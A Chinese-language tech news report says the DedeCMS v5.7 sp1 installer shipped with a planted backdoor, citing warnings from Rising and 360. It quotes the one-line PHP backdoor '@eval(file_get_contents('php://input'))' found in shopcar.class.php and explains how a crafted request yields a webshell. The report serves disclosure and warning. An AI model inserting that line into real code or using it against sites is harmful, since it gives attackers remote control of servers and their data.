linux Windows Ubuntu 编程 Python 微软 开源 nginx php apache shell google Firefox 云计算 程序员 wordpress java centos Android mysql

织梦CMS系统被曝植入后门 70万网站资料或泄露

织梦 dedeCMS 中被植入的后门代码
织梦 CMS 中被植入的后门代码

3月 22 日消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)v5.7 sp1 版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

据织梦 CMS 官方数据显示,目前约有 70 万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。

安全界人士分析发现,此次织梦 CMS 曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的 WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。

延伸阅读

评论